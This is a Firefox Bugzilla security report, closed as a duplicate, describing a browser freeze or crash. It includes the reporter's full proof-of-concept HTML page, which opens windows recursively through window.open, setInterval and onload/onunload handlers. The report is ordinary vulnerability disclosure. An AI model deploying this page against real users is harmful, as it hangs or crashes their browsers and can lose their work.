Closed
Bug 1203439
Opened 9 years ago
Closed 9 years ago
Firefox Remote Denial of Service vulnerability
Categories
(Firefox :: Untriaged, defect)
Firefox
Untriaged
Tracking
()
RESOLVED
DUPLICATE
of bug 685828
People
(Reporter: lukas, Unassigned)
Details
Attachments
(1 file)
|
245.15 KB,
application/pdf
|
Details |
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Build ID: 20150511103818
Steps to reproduce:
In the last time i tried to find securtiy holes in the current version of Mozilla Firefox because it's my favourit browser.
So after some time i find a bug in the javascript engine which lead to a crash of Firefox after some seconds (Remote DoS).The Browser doesn't respond any longer to any user input, all tabs are no longer accessible. Also memory corruption or code execution might be possible.
I think all Versions are vulnerable.
So here is the HTML Code:
<html>
<script>
var a = ('javascript:"<html><head><title>Damm !</title></head><body onunload=\\"javascript:window.open(window.location);window.open(window.location)\\" onload=\\"javascript:window.open(window.location);window.open(window.location)\\"></body></html>"');
function loop() {window.open(a);setInterval(loop,1);}
</script>
<body onload="javascript:loop()"></body>
</html>
Actual results:
After some seconds Firefox freeze and crash.
Expected results:
A window should appear which ask to stop the running scrip.
|
||
Updated•9 years ago
|
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 9 years ago
Resolution: --- → DUPLICATE
|
||
Updated•9 years ago
|
Flags: sec-bounty-
You need to log in
before you can comment on or make changes to this bug.
Description
•